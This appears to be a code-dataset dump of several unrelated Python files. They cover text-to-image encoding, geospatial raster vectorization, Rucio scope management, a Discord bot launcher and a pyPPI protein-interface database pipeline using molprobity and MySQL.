content
stringlengths 0
1.05M
| origin
stringclasses 2
values | type
stringclasses 2
values |
|---|---|---|
import re
import string
from math import sqrt
import numpy as np
from PIL import Image
from .test_utils import show_html_diff
def digits_in_base_as_tuple(x, base):
"""
x is int
base is int
gets the digits of x in the new base
e.g. digits_in_base_as_tuple(20, 2) == (1,0,1,0,0)
"""
cur = x
digs = []
while cur:
digs.append(cur % base)
cur /= base
return tuple(reversed(digs))
def get_word_color_map_fcn(all_words):
"""
given a set of words, returns a fcn
returning an RGB color
where each word is maximally spaced out from other word colors
"""
words = set(all_words)
words.add(' ') # add space for padding
ncolors = 256**3
ncolors_per_word = ncolors/len(words)
word_order = sorted(words)
def get_word_color(word):
ind = word_order.index(word)
assert ind >= 0
colors = digits_in_base_as_tuple(ind*ncolors_per_word, 256)
while len(colors) < 3:
colors = (0,) + colors
assert len(colors) == 3
return colors
return get_word_color
def list_to_uint8_array(colors, dims):
arr = np.array(colors)
arr_shaped = np.resize(arr, dims)
if arr.size != arr_shaped.size:
diff = arr_shaped.size - arr.size
print "WARNING: txt will be replicated by {0} chars when printed to image".format(diff)
arr_shaped = np.uint8(arr_shaped)
return arr_shaped
def adjust_words_and_get_dims(words, verbose=False):
area = len(words)
one_side = sqrt(area)
desired_side = (int(one_side)+1) if one_side > int(one_side) else int(one_side)
diff = desired_side**2 - area
words += [' ']*diff
assert len(words) == desired_side**2, desired_side**2 - len(words)
if verbose:
print 'Adding %s words to end of txt' % (diff,)
return words, [desired_side, desired_side, 3]
def str_to_words(txt, keep_spaces=False):
# if keep_spaces:
# # want each space to be its own word
# space_first = txt[0] == ' '
# words = str_to_words(txt)
# space_chunks = [x for x in re.split('[^ ]', txt) if x] + [' ']
# final = []
# for word, space in zip(words, space_chunks):
# if space_first:
# for i in range(len(space)):
# final.append(' ')
# final.append(word)
# else:
# final.append(word)
# for i in range(len(space)):
# final.append(' ')
# return final
if keep_spaces:
words = str_to_words(txt)
spaces = [x for x in re.split('[^ ]', txt) if x] + [' ']
return [x for pair in zip(words, spaces) for x in pair]
else:
return txt.split()
# return re.sub('['+string.punctuation+']', '', txt).split()
def txt_to_uint8_array_by_word(txt):
words = str_to_words(txt, True)
words, dims = adjust_words_and_get_dims(words)
get_color = get_word_color_map_fcn(words)
colors = [get_color(word) for word in words]
return list_to_uint8_array(colors, dims)
def adjust_txt_and_get_dims(txt, verbose=False):
added = 0
# pad with 0s to make divisible by 3
rem = len(txt) % 3
add = 3-rem if rem else 0
txt += ' '*add
added += add
# pad with 0s to make square
area = len(txt)/3
one_side = sqrt(area)
desired_side = (int(one_side)+1) if one_side > int(one_side) else int(one_side)
diff = 3*(desired_side**2 - area)
txt += ' '*diff
added += diff
assert len(txt) == 3*(desired_side**2), 3*(desired_side**2) - len(txt)
if verbose:
print 'Adding %s spaces to end of txt' % (added,)
return txt, [desired_side, desired_side, 3]
def txt_to_uint8_array_by_char(txt):
txt, dims = adjust_txt_and_get_dims(txt, True)
colors = [ord(x) for x in txt]
return list_to_uint8_array(colors, dims)
def image_to_txt(imfile, txtfile):
"""
converts each character to a number
assuming the character is ascii
and arranges all resulting colors into an array => image
note: colors are inserted depth first, meaning
e.g. if the first word is 'the'
then the first pixel will be (ord('t'), ord('h'), ord('e'))
'the' => (116, 104, 101) == #6A6865
"""
png = Image.open(imfile).convert('RGB')
arr = np.array(png)
dims = arr.size
arr_flat = np.resize(arr, dims)
chars = [chr(x) for x in arr_flat]
with open(txtfile, 'w') as f:
f.write(''.join(chars))
def txt_to_image(txtfile, imfile, by_char=True):
txt = open(txtfile).read()
if by_char:
arr = txt_to_uint8_array_by_char(txt)
else:
arr = txt_to_uint8_array_by_word(txt)
im = Image.fromarray(arr)
im.save(imfile)
def test_adjust_txt_and_get_dims():
vals = [5, 10, 11, 19, 24, 25, 31, 32, 269393]
sides = [2, 2, 2, 3, 3, 3, 4, 4, 300]
for val, side in zip(vals, sides):
assert adjust_txt_and_get_dims(' '*val)[1] == [side, side, 3], val
def test_invertibility(txtfile):
"""
roughly, assert txtfile == image_to_txt(txt_to_image(txtfile))
ignoring whitespace before and after txt
"""
pngfile = txtfile.replace('.txt', '.png')
txt_to_image(txtfile, pngfile)
new_txtfile = txtfile.replace('.', '_new.')
image_to_txt(pngfile, new_txtfile)
txt1 = open(txtfile).read().strip()
txt2 = open(new_txtfile).read().strip()
assert txt1 == txt2, show_html_diff((txt1, 'OG'), (txt2, 'NEW'))
def test_all():
txtfile = 'docs/tmp.txt'
test_adjust_txt_and_get_dims()
test_invertibility(txtfile)
if __name__ == '__main__':
test_all()
by_char = False
base_dir = '/Users/mobeets/bpcs-steg/docs/'
infiles = ['karenina', 'warandpeace']
infiles = ['tmp', 'tmp1', 'tmp2']
infiles = [base_dir + infile + '.txt' for infile in infiles]
outfiles = [base_dir + outfile + '.txt' for outfile in outfiles]
for infile,outfile in zip(infiles, outfiles):
txt_to_image(infile, outfile, by_char)
# infile = '/Users/mobeets/Desktop/tmp2.png'
# outfile = '/Users/mobeets/Desktop/tmp2.txt'
# image_to_txt(infile, outfile, by_char)
|
nilq/baby-python
|
python
|
"""
Illustrates saving things back to a geotiff and vectorizing to a shapefile
"""
import numpy as np
import matplotlib.pyplot as plt
import rasterio as rio
import rasterio.features
import scipy.ndimage
import fiona
import shapely.geometry as geom
from context import data
from context import utils
# First, let's reproduce the labeled array of seamounts and areas
with rio.open(data.gebco.seamounts, 'r') as src:
bathy = src.read(1)
cellsize = src.transform.a # Cells are square and N-S in this case
background = scipy.ndimage.uniform_filter(bathy, int(0.5 / cellsize))
better_threshold = bathy > (background + 500)
cleaned = scipy.ndimage.median_filter(better_threshold, 15)
filled = scipy.ndimage.binary_fill_holes(cleaned)
labels, count = scipy.ndimage.label(filled)
# ------ Save as a geotiff ---------------------------------------------------
# Next, let's save the result as a geotiff. Because our data is the same size
# as the original raster, it's quite straight-forward:
# We'll copy over all settings from the original, but change two...
with rio.open(data.gebco.seamounts, 'r') as src:
profile = src.profile.copy()
# Background features are 0, so we'll make that nodata/transparent.
profile['nodata'] = 0
profile['dtype'] = labels.dtype
# And let's actually write out the new geotiff...
with rio.open('regions_flagged_as_seamounts.tif', 'w', **profile) as dst:
dst.write(labels, 1)
# ------ Save as a shapefile -------------------------------------------------
# Now let's vectorize the results and save them as a shapefile
# Just to make things a bit more interesting, let's go ahead and calculate some
# additional information to save in the shapefile's attribute table.
deepest = scipy.ndimage.maximum(bathy, labels, np.arange(count) + 1)
shallowest = scipy.ndimage.minimum(bathy, labels, np.arange(count) + 1)
# We'll need the affine transformation and the projection to go from pixel
# indices to actual locations. Let's grab those from the original geotiff.
with rio.open(data.gebco.seamounts, 'r') as src:
transform = src.transform
crs = src.crs
# Now let's specify our output shapefile's format...
meta = {'crs': crs, 'schema': {}, 'driver': 'ESRI Shapefile'}
meta['schema']['geometry'] = 'Polygon'
# And now we'll define the fields in the attribute table
meta['schema']['properties'] = {'raster_id': 'int',
'deepest': 'int',
'shallowest': 'int'}
# We don't want the background 0 to be a feature, so let's mask it out.
labels = np.ma.masked_equal(labels, 0)
with fiona.open('regions_flagged_as_seamounts.shp', 'w', **meta) as dst:
vectors = rio.features.shapes(labels, transform=transform, connectivity=8)
for poly, val in vectors:
val = int(val) # shapes returns a float, even when the input is ints.
# The polygon we get here will have stairsteps along each pixel edge.
# This part is optional, but it's often useful to simplify the geometry
# instead of saving the full "stairstep" version.
poly = geom.shape(poly).simplify(cellsize)
poly = geom.mapping(poly) # Back to a dict
record = {'geometry': poly,
'properties': {'deepest': int(deepest[val-1]),
'shallowest': int(shallowest[val-1]),
'raster_id': val}}
dst.write(record)
|
nilq/baby-python
|
python
|
# Copyright European Organization for Nuclear Research (CERN)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# You may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Authors:
# - Thomas Beermann, <thomas.beermann@cern.ch>, 2012
# - Angelos Molfetas, <angelos.molfetas@cern.ch>, 2012
# - Mario Lassnig, <mario.lassnig@cern.ch>, 2012-2013
# - Vincent Garonne, <vincent.garonne@cern.ch>, 2012-2015
# - Cedric Serfon, <cedric.serfon@cern.ch>, 2015
# - Hannes Hansen, <hannes.jakob.hansen@cern.ch>, 2019
#
# PY3K COMPATIBLE
from re import match
from sqlalchemy.exc import IntegrityError
from traceback import format_exc
from rucio.common.exception import AccountNotFound, Duplicate, RucioException
from rucio.core.vo import vo_exists
from rucio.db.sqla import models
from rucio.db.sqla.constants import AccountStatus, ScopeStatus
from rucio.db.sqla.session import read_session, transactional_session
@transactional_session
def add_scope(scope, account, session=None):
""" add a scope for the given account name.
:param scope: the name for the new scope.
:param account: the account to add the scope to.
:param session: The database session in use.
"""
if not vo_exists(vo=scope.vo, session=session):
raise exception.RucioException('VO {} not found'.format(scope.vo))
result = session.query(models.Account).filter_by(account=account, status=AccountStatus.ACTIVE).first()
if result is None:
raise AccountNotFound('Account ID \'%s\' does not exist' % account)
new_scope = models.Scope(scope=scope, account=account, status=ScopeStatus.OPEN)
try:
new_scope.save(session=session)
except IntegrityError as e:
if match('.*IntegrityError.*ORA-00001: unique constraint.*SCOPES_PK.*violated.*', e.args[0]) \
or match('.*IntegrityError.*1062, "Duplicate entry.*for key.*', e.args[0]) \
or match('.*IntegrityError.*UNIQUE constraint failed: scopes.scope.*', e.args[0]) \
or match('.*IntegrityError.*duplicate key value violates unique constraint.*', e.args[0])\
or match('.*sqlite3.IntegrityError.*is not unique.*', e.args[0]):
raise Duplicate('Scope \'%s\' already exists!' % scope)
except:
raise RucioException(str(format_exc()))
@read_session
def bulk_add_scopes(scopes, account, skipExisting=False, session=None):
""" add a group of scopes, this call should not be exposed to users.
:param scopes: a list of scopes to be added.
:param account: the account associated to the scopes.
:param session: The database session in use.
"""
for scope in scopes:
try:
add_scope(scope, account, session=session)
except Duplicate:
if not skipExisting:
raise
@read_session
def list_scopes(session=None):
"""
Lists all scopes.
:param session: The database session in use.
:returns: A list containing all scopes.
"""
scope_list = []
query = session.query(models.Scope).filter(models.Scope.status != ScopeStatus.DELETED)
for s in query:
scope_list.append(s.scope)
return scope_list
@read_session
def get_scopes(account, session=None):
""" get all scopes defined for an account.
:param account: the account name to list the scopes of.
:param session: The database session in use.
:returns: a list of all scope names for this account.
"""
result = session.query(models.Account).filter_by(account=account).first()
if result is None:
raise AccountNotFound('Account ID \'%s\' does not exist' % account)
scope_list = []
for s in session.query(models.Scope).filter_by(account=account).filter(models.Scope.status != ScopeStatus.DELETED):
scope_list.append(s.scope)
return scope_list
@read_session
def check_scope(scope_to_check, session=None):
""" check to see if scope exists.
:param scope: the scope to check.
:param session: The database session in use.
:returns: True or false
"""
return True if session.query(models.Scope).filter_by(scope=scope_to_check).first() else False
@read_session
def is_scope_owner(scope, account, session=None):
""" check to see if account owns the scope.
:param scope: the scope to check.
:param account: the account to check.
:param session: The database session in use.
:returns: True or false
"""
return True if session.query(models.Scope).filter_by(scope=scope, account=account).first() else False
|
nilq/baby-python
|
python
|
import os
import discord
from discord.ext import commands
import sqlite3
import traceback
import sys
import asyncpg
from asyncpg.pool import create_pool
import json
import keep_alive
with open ('config/botconfig.json', 'r') as f:
config = json.load(f)
token = config['token']
prefix = config['prefix']
database_url = config['database_url']
# for replit
'''
token = os.environ.get("token")
prefix = os.environ.get("prefix")
database_url = os.environ.get("database_url")
'''
intents = discord.Intents().all()
bot = commands.Bot(command_prefix=prefix, intents = discord.Intents.all())
bot.remove_command('help')
intents.members = True
#databse
async def create_db_pool():
bot.pg_con = await asyncpg.create_pool(database_url)
print("[\] DATABASE CONNECTED")
#Ready
@bot.event
async def on_ready():
await bot.change_presence(status=discord.Status.idle, activity=discord.Activity(type=discord.ActivityType.watching, name="DMs for help") )
print("[\] BOT ONLNE")
#modules Importing
with open ('./config/modules.json', 'r') as f:
cogsData = json.load(f)
module = cogsData['extensions']
if __name__ == "__main__":
for values in module:
try:
bot.load_extension(values)
print(f"[/] loaded | {values}")
except:
print(f'Error loading {values}', file=sys.stderr)
traceback.print_exc()
keep_alive.keep_alive()
bot.loop.run_until_complete(create_db_pool())
bot.run(token)
|
nilq/baby-python
|
python
|
#!/usr/bin/env python
"""
Setups a protein database in MySQL: a database of interesting properties of the proteins based on scripts of this library.
This should be easy to use script for invoking the most important scripts of the library and store them in DB
for easy retrieve.
How to use:
Create a folder and place there some file with list of PDBs to analyze.
The program will create the following directory structure in the same directory:
./pdbs/ - list of pdbs downloaded
./results/ - results of the analysis scripts
"""
from __future__ import print_function
import argparse
import os
import subprocess
import sys
import pkg_resources
import requests
from Bio.PDB.PDBParser import PDBParser
from Bio.PDB.ResidueDepth import get_surface, min_dist
from pyPPI import DBConfig
import pyPPI.surfaceComplementarity.VDW as VDW
import pyPPI.surfaceComplementarity.interfaceDepth as Periphery
from pyPPI.ASA import ASA
from pyPPI.hbonds import hbonds
from pyPPI.kdtree import KDTree
import pyPPI.pdbReader as pdbReader
from pyPPI.pdbReader import PDBReader
import pyPPI.electrostat as electrostat
from pyPPI.cavities import calculateVolume
"""
Distance in angtroms between the chains that is relevant for defining the interface
"""
INTERFACE_DISTANCE = 4
WORKING_DIRECTORY = './'
PDBS_DIR = "./pdbs/"
RESULTS_DIR = "./results/"
_remediator = pkg_resources.resource_filename('pyPPI', '/'.join(['molprobity', 'remediator.pl']))
_reduce_path = pkg_resources.resource_filename('pyPPI', '/'.join(['molprobity', 'reduce']))
def download_PDB(pdb):
"""
Downloads a PDB from protein data base
:param pdb: pdb identifier
"""
url = 'http://www.rcsb.org/pdb/files/{0}.pdb'.format(pdb)
print('downloading %s (%s)' % (pdb, url))
req = requests.get(url)
with get_file(pdb) as newPDB:
print(req.text, file=newPDB)
def get_file(name):
"""
Get file for write in the PDBS_DIR
:param name:
:return:
"""
global PDBS_DIR
return open(os.path.join(PDBS_DIR, name + ".pdb"), "w")
def download_DB(pdbList):
"""
Downloads PDB and add hydrogens using molprobity
:param pdbList: list of pdbs to download
"""
print("Downloading pdbs according to list")
for pdb in pdbList:
# don't download twice the same PDB
if os.path.exists(os.path.join(PDBS_DIR, pdb + "_FH.pdb")): continue
# in case the PDB is already in the directory
if not os.path.exists(os.path.join(PDBS_DIR, pdb + ".pdb")):
download_PDB(pdb)
molprobity(pdb)
print("Finished downloading pdbs")
def molprobity(pdb_name):
"""
runs molprobility on a input protein
:param pdb_name: name of the PDB file
:return:
"""
global MOLPROBITY_DIR, PDBS_DIR
if os.path.exists(os.path.join(PDBS_DIR, pdb_name + "_FH.pdb")):
return True # already exist
print('Starting molprobity %s' % pdb_name)
subprocess.check_output('perl ' + _remediator + ' ' + os.path.join(PDBS_DIR,
pdb_name + ".pdb") + ' > a',
shell=True)
try:
subprocess.check_output(_reduce_path + ' a > b', shell=True)
except:
print('error prasing PDB %s' % pdb_name)
pass # yakky kaky, but reduce returns 1 exit
subprocess.check_output(
'perl ' + _remediator +' b -oldout> ' + os.path.join(PDBS_DIR, pdb_name + "_FH.pdb"),
shell=True)
# delete the PDB file - we will work with a file with hydrogens added (_FH create above)
os.remove(os.path.join(PDBS_DIR, pdb_name + ".pdb"))
def buildASAperAtomForComplex(pdb, result):
asaCalc = ASA(pdb)
asaCalc.execute()
for atom, asa in asaCalc.interPerAtom.items():
# complex inter
res = [pdb.name, atom.chain, atom.residue, atom.resId, atom.symbol, atom.atomType, asa, atom.tempFactor, 0]
print(','.join([str(a) for a in res]), file=result)
# complex intra (separated)
asa = asaCalc.diffASAperAtom[atom] + asa
res = [pdb.name, atom.chain, atom.residue, atom.resId, atom.symbol, atom.atomType, asa, atom.tempFactor, 1]
print(','.join([str(a) for a in res]), file=result)
def calcInterfaceDist(pdb, result):
"""
Defines interface by distance
"""
global INTERFACE_DISTANCE
partA = [a for a in pdb.atoms if a.chain in pdb.interfaceParts[0]]
partB = [a for a in pdb.atoms if a.chain in pdb.interfaceParts[1]]
if len(partA) == 0 or len(partB) == 0:
print('WARNING: %s doesnt have atoms in one its chains' % pdb.name)
return
aTree = KDTree.construct_from_data(partA[:])
bTree = KDTree.construct_from_data(partB[:])
complexChains = ':'.join(pdb.interfaceParts)
for part, tree in [(partA, bTree), (partB, aTree)]:
for atom in part:
near, dist = tree.findNearest(query_point=atom.coord, num=1)
if dist < INTERFACE_DISTANCE:
print(','.join([pdb.name, complexChains, atom.chain, str(atom.resId), atom.symbol, atom.atomType, str(dist)]), file=result)
def createInterfaceCSV(pdbsToAnalyze):
"""
interface can be defined by either ASA or distance
we use both of them
"""
global PDBS_DIR, RESULTS_DIR
if all(os.path.exists(os.path.join(RESULTS_DIR, resFile)) for resFile in ['PerAtomASA.csv', 'PerAtomASA.csv']):
print('Data already exist in result directory.')
return
with open(os.path.join(RESULTS_DIR, 'PerAtomASA.csv'), 'w') as asaPerAtom:
with open(os.path.join(RESULTS_DIR, 'PerAtomDistance.csv'), 'w') as distancePerAtom:
pdbs = os.listdir(PDBS_DIR)
print('PDB,Chains,Chain,ResId,Symbol,Atom,MinDistance', file=distancePerAtom)
print('PDB,Chain,Residue,ResId,Symbol,AtomType,ASA,tempFactor,Seperated', file=asaPerAtom)
failedPDBs = []
pdbsNamesToChains = dict((p[0], p[1].split(':') if len(p) > 1 else None) for p in pdbsToAnalyze)
for pdbName in pdbs:
if pdbName[0:4] not in pdbsNamesToChains: continue
pdb = PDBReader.readFile(os.path.join(PDBS_DIR, pdbName), pdbsNamesToChains[pdbName[0:4]])
try:
print('Writing ASA for %s' % pdb.name)
buildASAperAtomForComplex(pdb, asaPerAtom)
print('Writing distance for %s' % pdb.name)
calcInterfaceDist(pdb, distancePerAtom)
except IndexError:
failedPDBs.append(pdb.name)
print('Finished')
if len(failedPDBs) > 0:
print('Failed to process:', ','.join(failedPDBs))
def createDataBase(pdbsToAnalyzeWithChains):
"""Loads teh computations to a new database
:param pdbsToAnalyzeWithChains:
"""
print('Creating DB: %s' % DBConfig.DB_NAME)
installDB = pkg_resources.resource_filename('pyPPI', '/'.join(['sqls', 'createDB.sql']))
metadataDB = pkg_resources.resource_filename('pyPPI', '/'.join(['sqls', 'donors2.sql']))
createInterfaceSql = pkg_resources.resource_filename('pyPPI', '/'.join(['sqls', 'createInterface.sql']))
subprocess.call(
"mysql -u%s -p%s -e 'create database if not exists %s'" % (DBConfig.USER, DBConfig.PASSWD, DBConfig.DB_NAME),
shell=True)
# create schema
subprocess.call('mysql %s -u%s -p%s < %s ' % (DBConfig.DB_NAME, DBConfig.USER, DBConfig.PASSWD, installDB),
shell=True)
# insert metadata
subprocess.call('mysql %s -u%s -p%s < %s ' % (DBConfig.DB_NAME, DBConfig.USER, DBConfig.PASSWD, metadataDB),
shell=True)
conn = DBConfig.get_connection()
cursor = conn.cursor()
cursor.execute('''
load data local infile '%s' into table interfaceDist fields terminated by ',' optionally enclosed by '"' lines terminated by '\n' ignore 1 lines (PDB,Chains,Chain,ResId,Symbol,Atom,MinDist);
''' % (os.path.join(RESULTS_DIR, 'PerAtomDistance.csv')))
cursor.execute('''
load data local infile '%s' into table perAtomASA fields terminated by ',' optionally enclosed by '"' lines terminated by '\n' ignore 1 lines (PDB,Chain,Residue,ResId,Symbol,Atom,ASA,Bfactor,Seperated);
''' % (os.path.join(RESULTS_DIR, 'PerAtomASA.csv')))
conn.commit()
# create interface table
subprocess.call('mysql %s -u%s -p%s < %s ' % (DBConfig.DB_NAME, DBConfig.USER, DBConfig.PASSWD, createInterfaceSql),
shell=True)
# add metadata table with complexs in the database
pdbsNamesToChains = dict((p[0], p[1].split(':') if len(p) > 1 else None) for p in pdbsToAnalyzeWithChains)
dataToInsert = []
for pdbName, chains in pdbsNamesToChains.items():
pdb = PDBReader.readFile(os.path.join(PDBS_DIR, '%s_FH.pdb' % pdbName), pdbsNamesToChains[pdbName[0:4]])
if chains is None:
compunds = pdb.compunds.split(' - ')
dataToInsert.append((pdbName, pdb.interfaceParts[0], compunds[0] if len(compunds) > 1 else compunds,
pdb.interfaceParts[1], compunds[1] if len(compunds) > 1 else ''))
else:
dataToInsert.append((pdbName, pdb.interfaceParts[0], '', pdb.interfaceParts[1], ''))
cursor = conn.cursor()
cursor.executemany('''
INSERT INTO proteinComplex (PDB,UnboundChainA,NameA,UnboundChainB,NameB)
values (%s,%s,%s,%s,%s)
''', dataToInsert)
conn.commit()
conn.close()
print('database created!')
def getInterfaceAtoms(cur, pdb):
"""
Gets interface atoms from database
:param cur: cursor to database
:param pdb: pdb object to get atoms from
:return: list of interface atoms
"""
cur.execute('''
select Chain,ResId,Symbol from NinterfaceAtoms
where PDB='%s'
''' % pdb.name)
interfaceAtoms = []
for chain, resid, symbol in cur.fetchall():
interfaceAtoms.append(
next(a for a in pdb.atoms if a.chain == chain and a.resId == resid and a.symbol == symbol))
return interfaceAtoms
def fillInterfacePeriphrial(pdbsToAnalyze):
global PDBS_DIR, RESULTS_DIR
if os.path.exists(os.path.join(RESULTS_DIR, 'interfacePeriphrial.csv')):
print('Data already exist in result directory for interface periphery.')
return
pdbsNamesToChains = dict((p[0], p[1].split(':') if len(p) > 1 else None) for p in pdbsToAnalyze)
with open(os.path.join(RESULTS_DIR, 'interfacePeriphrial.csv'), 'w') as interfacePeriphrial:
print('PDB,Chain,ResId,Symbol,Peripherial,PropPeri', file=interfacePeriphrial)
for pdbName, chains in pdbsNamesToChains.items():
print('Calculating peripheral table for %s ' % pdbName)
pdb_path = os.path.join(PDBS_DIR, '%s_FH.pdb' % pdbName)
depthL, peripherialL = Periphery.calc_peripheral_PDB(pdb_path, chains)
for atom, peri, propPeri in peripherialL:
print(','.join([pdbName, atom.chain, str(atom.resId), atom.symbol, str(peri), str(propPeri)]),
file=interfacePeriphrial)
conn = DBConfig.get_connection()
cursor = conn.cursor()
cursor.execute('''
load data local infile '%s' into table interfacePeriphrial
fields terminated by ',' optionally enclosed by '"' lines terminated by '\n'
ignore 1 lines (PDB,Chain,ResId,Symbol,Peri,PropPeri);
''' % (os.path.join(RESULTS_DIR, 'interfacePeriphrial.csv')))
conn.commit()
conn.close()
conn = DBConfig.get_connection()
cursor = conn.cursor()
cursor.execute('''
load data local infile '%s' into table interfacePeriphrial
fields terminated by ',' optionally enclosed by '"' lines terminated by '\n'
ignore 1 lines (PDB,Chain,ResId,Symbol,Peri,PropPeri);
''' % (os.path.join(RESULTS_DIR, 'interfacePeriphrial.csv')))
conn.commit()
conn.close()
def residue_depth(pdbName, ReaderAtomsInput, filename, UseInterfaceAtoms=False):
parser = PDBParser(PERMISSIVE=1)
structure = parser.get_structure(pdbName, filename)
model = structure[0]
BioAtoms = []
for chain in model:
for residue in chain:
for atom in residue:
BioAtoms.append(atom)
if UseInterfaceAtoms:
BioAtoms = pdbReader_to_BioPyth(ReaderAtomsInput, BioAtoms)
surface = get_surface(model)
BioDepthDistances = []
for atom in BioAtoms:
dist = min_dist(atom.get_coord(), surface)
BioDepthDistances.append([atom, dist])
pdbReaderDistances = BioPyth_to_pdbReader(BioDepthDistances, ReaderAtomsInput)
return pdbReaderDistances
def pdbReader_to_BioPyth(ReaderAtomsInput, BioAtomsInput):
BioAtomsOutput = []
for a in ReaderAtomsInput:
for atom in BioAtomsInput:
residue = atom.get_parent()
if residue.get_id() == (' ', a.resId, ' ') and atom.get_name() == a.symbol:
BioAtomsOutput.append(atom)
break
return BioAtomsOutput
def BioPyth_to_pdbReader(BioAtomsInput, ReaderAtomsInput):
ReaderAtomsOutput = []
for atom, dist in BioAtomsInput:
residue = atom.get_parent()
for a in ReaderAtomsInput:
if residue.get_id() == (' ', a.resId, ' ') and atom.get_name() == a.symbol:
ReaderAtomsOutput.append([a, dist])
break
return ReaderAtomsOutput
def calcEnergyTerms(pdbsToAnalyze):
"""
Finds hydrogen bonds near interface atoms and calculates their energy,
and calculates VDW and electrostatic energy for PDB
"""
global PDBS_DIR, RESULTS_DIR
output_file_list = ['Ndrieding.csv', 'interfaceVDW.csv', 'electrostatic.csv', 'electrostatic-hydrophobic.csv', 'cavity_vol.csv', 'cavity_res.csv', 'residue_depth.csv']
if all(os.path.exists(os.path.join(RESULTS_DIR, resFile)) for resFile in output_file_list):
print('Data already exists in result directory for energy terms.')
return
conn = DBConfig.get_connection()
cursor = conn.cursor()
pdbsNamesToChains = dict((p[0], p[1].split(':') if len(p) > 1 else None) for p in pdbsToAnalyze)
if os.path.exists(os.path.join(RESULTS_DIR, 'Ndrieding.csv')) and os.path.exists(os.path.join(RESULTS_DIR, 'electrostatic-hydrophobic.csv')):
print('Skipping hydrophobic calculations since file already exists.')
if not os.path.exists(os.path.join(RESULTS_DIR, 'Ndrieding.csv')) or not os.path.exists(os.path.join(RESULTS_DIR, 'electrostatic-hydrophobic.csv')):
#the Ndrieding.csv is needed if electrostatic-hydrophobic.csv does not exist because it loads the Hbonds into the database
with open(os.path.join(RESULTS_DIR, 'Ndrieding.csv'), 'w') as driedingResult:
print('PDB,DonorChain,DonorResId,DonorSymbol,AccChain,AccResId,AccSymbol,Energy', file=driedingResult)
pdbs = os.listdir(PDBS_DIR)
for pdbName in pdbs:
if pdbName[0:4] not in pdbsNamesToChains: continue
pdb = PDBReader.readFile(os.path.join(PDBS_DIR, pdbName), pdbsNamesToChains[pdbName[0:4]])
interfaceAtoms = getInterfaceAtoms(cursor, pdb)
bonds = hbonds(pdb)
bonds.HDPlusDefinition = False
cBondList = bonds.hbonds(interfaceAtoms)
print('Calcing Hbonds for %s' % pdb.name)
for donor, acceptor, eng in cBondList:
toPrint = [pdb.name, donor.chain, donor.resId, donor.symbol, acceptor.chain, acceptor.resId,
acceptor.symbol, eng]
print(','.join([str(a) for a in toPrint]), file=driedingResult)
cursor.execute('''
load data local infile '%s' into table Ndrieding
fields terminated by ',' optionally enclosed by '"' lines terminated by '\n'
ignore 1 lines (PDB,DonorChain,DonorResId,DonorSymbol,AccChain,AccResId,AccSymbol,Energy);
''' % (os.path.join(RESULTS_DIR, 'Ndrieding.csv')))
conn.commit()
if os.path.exists(os.path.join(RESULTS_DIR, 'interfaceVDW.csv')):
print('Skipping VDW energy calculations since file already exists.')
if not os.path.exists(os.path.join(RESULTS_DIR, 'interfaceVDW.csv')):
print('Calculating VDW energy between interfaces')
with open(os.path.join(RESULTS_DIR, 'interfaceVDW.csv'), 'w') as vdw_result:
print('PDB,VDV,VDVx,clashV,clashS', file=vdw_result)
for pdb, chains in pdbsNamesToChains.items():
print('Calcing VDW for %s' % pdb)
pdb_path = os.path.join(PDBS_DIR, '%s_FH.pdb' % pdb)
sumVDW, sumVDWx, clashV, clashS = VDW.calcCompl(pdb_path, chains)
print(','.join([pdb, str(sumVDW), str(sumVDWx), str(clashV), str(clashS)]), file=vdw_result)
cursor.execute('''
load data local infile '%s' into table interfaceVDW
fields terminated by ',' optionally enclosed by '"' lines terminated by '\n'
ignore 1 lines (PDB,VDV,VDVx6,ClashV,ClashS);
''' % (os.path.join(RESULTS_DIR, 'interfaceVDW.csv')))
conn.commit()
if os.path.exists(os.path.join(RESULTS_DIR, 'electrostatic.csv')):
print('Skipping electrostatic charge calculations since file already exists.')
if not os.path.exists(os.path.join(RESULTS_DIR, 'electrostatic.csv')):
print('Calculating electrostatic charges (Coulomb of paired charges except hydrogen bonds)')
with open(os.path.join(RESULTS_DIR, 'electrostatic.csv'), 'w') as electro_res:
print('PDB,eCoulomb,pp,mm,pm', file=electro_res)
for pdb, chains in pdbsNamesToChains.items():
pdb_path = os.path.join(PDBS_DIR, '%s_FH.pdb' % pdb)
pdb = PDBReader.readFile(pdb_path, chains)
interfaceAtoms = getInterfaceAtoms(cursor, pdb)
e, pp, mm, pm = electrostat.calcElectrostatic(pdb, interfaceAtoms)
print('%s,%f,%i,%i,%i' % (pdb.name, e, pp, mm, pm), file=electro_res)
cursor.execute('''
load data local infile '%s' into table electrostat
fields terminated by ',' optionally enclosed by '"' lines terminated by '\n'
ignore 1 lines (PDB,electro,pp,mm,pm);
''' % (os.path.join(RESULTS_DIR, 'electrostatic.csv')))
conn.commit()
if os.path.exists(os.path.join(RESULTS_DIR, 'electrostatic-hydrophobic.csv')):
print('Skipping electrostatic-hydrophobic interaction calculations since file already exists.')
if not os.path.exists(os.path.join(RESULTS_DIR, 'electrostatic-hydrophobic.csv')):
print('Calculating intermolecular electrostatic charges contacts with hydrophobic residues')
with open(os.path.join(RESULTS_DIR, 'electrostatic-hydrophobic.csv'), 'w') as electro_hydro_res:
print('inter-chain interactions', file=electro_hydro_res)
print('\nPDB Name,charged atom chain,charged atom resID,charged atom residue,charged atom symbol,charged atom depth,charge,hydrophobic atom chain,hydrophobic atom resID,hydrophobic atom residue,hydrophobic atom symbol', file=electro_hydro_res)
for pdbName, chains in pdbsNamesToChains.items():
if pdbName[0:4] not in pdbsNamesToChains: continue
pdb_path = os.path.join(PDBS_DIR, '%s_FH.pdb' % pdbName)
pdb = PDBReader.readFile(pdb_path, chains)
interfaceAtoms = getInterfaceAtoms(cursor, pdb)
depthDistances = residue_depth(pdbName[:4], interfaceAtoms, pdb_path, UseInterfaceAtoms=True)
inter_hydrophobic_charged_interactions = electrostat.calcInterElectroHydrophobic(pdb, interfaceAtoms, depthDistances)
for charged_atom, depth, charge, hydrophobic_atom in inter_hydrophobic_charged_interactions:
print(','.join([pdbName, charged_atom.chain, str(charged_atom.resId), charged_atom.residue, charged_atom.symbol, str(depth), charge, hydrophobic_atom.chain, str(hydrophobic_atom.resId), hydrophobic_atom.residue, hydrophobic_atom.symbol]), file=electro_hydro_res)
print('Calculating intramolecular electrostatic charges contacts with hydrophobic residues')
print('\nintra-chain interactions', file=electro_hydro_res)
